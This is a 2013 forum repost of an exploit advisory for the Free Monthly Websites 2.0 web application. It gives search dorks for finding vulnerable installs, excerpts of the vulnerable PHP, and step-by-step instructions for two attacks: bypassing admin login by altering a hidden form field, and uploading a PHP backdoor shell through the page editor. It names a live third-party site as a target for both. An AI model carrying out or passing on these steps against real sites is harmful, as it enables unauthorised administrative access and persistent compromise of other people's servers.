Praetorian503 Posted February 5, 2013 Report Posted February 5, 2013 Free Monthly Websites version 2.0 suffers from administrative login bypass and remote shell upload vulnerabilities.========================================================================================== Free Monthly Websites 2.0 Multiple Vulnerabilities==========================================================================================:----------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Free Monthly Websites 2.0 Multiple Vulnerabilities: # Date : 04 February 2013 : # Author : X-Cisadane : # Vendor : http://www.freemonthlywebsites2.com/: # Download : http://www.freemonthlywebsites2.com/downloads/fmw_oto/websites/Free_Monthly_Websites_50_Custom_Websites_MPW7199.zip: # Version : 2.0: # Category : Web Applications : # Vulnerability : Admin Login Bypass and Shell Upload Vulnerability : # Tested On : Google Chrome 24.0.1312.52 m (Windows XP SP 3 32-Bit English) : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Ngobas:----------------------------------------------------------------------------------------------------------------------------------: DORKS ===== inurl:/index_ebay.php"Powered by: Resell Rights Fortune""Generating Traffic to Your Site with Keyword Based Articles"Powered By: Free Monthly Websites 2.0Proof of Concept ================ [ 1 ] Admin Login BypassVulnerable page http://target.com/[path]/admin/index.phpLine 40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">41 <input type="hidden" name="do_type" value="admin_settings_read">Vulnerable page http://target.com/[path]/admin/login.phpLine40 <form name="frm" action="file_io.php" method="post" onSubmit="return chk()">41 <input type="hidden" name="do_type" value="admin_settings_read">Vulnerable page http://target.com/[path]/admin/file_io.phpLine14 if($_REQUEST[do_type]=="admin_settings_read")15 {16 $filename="settings/admin_settings.txt";1718 if(!$handle = fopen($filename, 'r'))19 {20 echo "Cannot open file ($filename)";21 exit;22 }23 $contents = fread($handle, filesize($filename));24 fclose($handle);25 $argument_arr=explode("#_1_#",$contents);2627 if($argument_arr[0]==$_REQUEST[username] && $argument_arr[1]==$_REQUEST[pass])28 {29 $_SESSION[logged_in]=true;30 header("location:welcome.php");Based at line 16 we know that Admin Username and Password store in admin_settings.txt NOT on Database! So When we login into Admin Panel, file_io.php will Read Valid Username and Password from admin_settings.txtIf you do a direct access to the file admin_settings.txt, The results is 403 Permission DeniedYou do not have permission for this request /admin/settings/admin_settings.txtPic : http://i48.tinypic.com/2gvlwt4.pngSo... How to Bypass Admin Login Page? 1st. Open the Admin Login Page : http://target.com/[path]/admin/index.php Live Target : http://www.massmoneywebsites.com/admin/2nd. Inspect Element on the login Form. Pic : http://i47.tinypic.com/2r5ddp1.png3rd. Change from <form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form><input type="hidden" name="do_type" value="admin_settings_read">CHANGE TO <form name="frm" action="file_io.php" method="post" onsubmit="return chk()"></form><input type="text" name="do_type" value="admin_settings_write">Then press ENTER (please see pic).Pic : http://i49.tinypic.com/351z3ib.png4th. You will see A Login Failed Page : >> You need to login in to access that page <<Pic : http://i50.tinypic.com/33ws8jb.pngNever Mind About that, just click 'Login Button' and VOILA you get and Admin Access!pic : http://i45.tinypic.com/jzwpea.png----------------------------------------[ 2 ] Upload PHP Backdoor or PHP Shell This vulnerability works on PREMIUM VERSION of Free Monthly Websites 2.0So... How to Upload Backdoor (PHP Shell)?1st. Go to Add/Remove Navigation Page. http://target.com/[path]/admin/add_main_pages.phpLive Target : http://www.massmoneywebsites.com/admin/add_main_pages.php2nd. Enter a Name For Your New Navigation Page That You Wish To Add: dwi.php And click Add New Navigation Page.Pic : http://i45.tinypic.com/vigzsp.png3rd. Still at the same page, scroll down the page until you see this section : Sort Your Page Buttons/Links.Pic : http://i46.tinypic.com/1040oxg.pngChange FROM dwi.php.html TO /dwi.php then Click Sort Navigation Pages.Pic : http://i49.tinypic.com/24ec1l0.jpg4th. Go to Edit Navigation Page.http://www.massmoneywebsites.com/admin/edit_main_pages.phpPlease Select a Page To Edit: dwi.php.html <--- Select that page.5th. Inspect element on dwi.php.htmlPic : http://i50.tinypic.com/29pq1ix.pngChange FROM <option value="dwi.php.html" selected="">dwi.php.html</option>To <option value="dwi.php" selected="">dwi.php</option>Pic : http://i47.tinypic.com/wtb0j6.png6th. Enter A Page Title As You Would Like It To Be Seen. Fill with dwi.phpURL For This Page: main_pages/dwi.php Use the 'URL For This Page' field above: [Tick] Display This Page in Left Vertical Site Navigation: [Tick]Display This Page in Top Horizontal Site Navigation Buttons: [Tick]Pic : http://i46.tinypic.com/1zebnle.png7th. Still at the same page, scroll down the page until you see this section : Enter Content For Your Page:Click SOURCE button Press Enter Twice at the First Line then Paste your PHP Backdoor/PHP Shell below.And Press Enter Twice at the Last Line.*Please see 2 Pictures below If you dunno Understand Pic 1 : http://i49.tinypic.com/1zlzxq0.pngPic 2 : http://i48.tinypic.com/291kc9h.pngIf you wanna do this, please Remove Your Backdoor Password.Click Save Edited Navigation Page.8th. After this message >> Data saved successfully << Appeared, Visit the Home Page and you will see the Backdoor PagePic : http://i49.tinypic.com/4rt1g4.png//I'm sorry My English was poorSource: PacketStorm Quote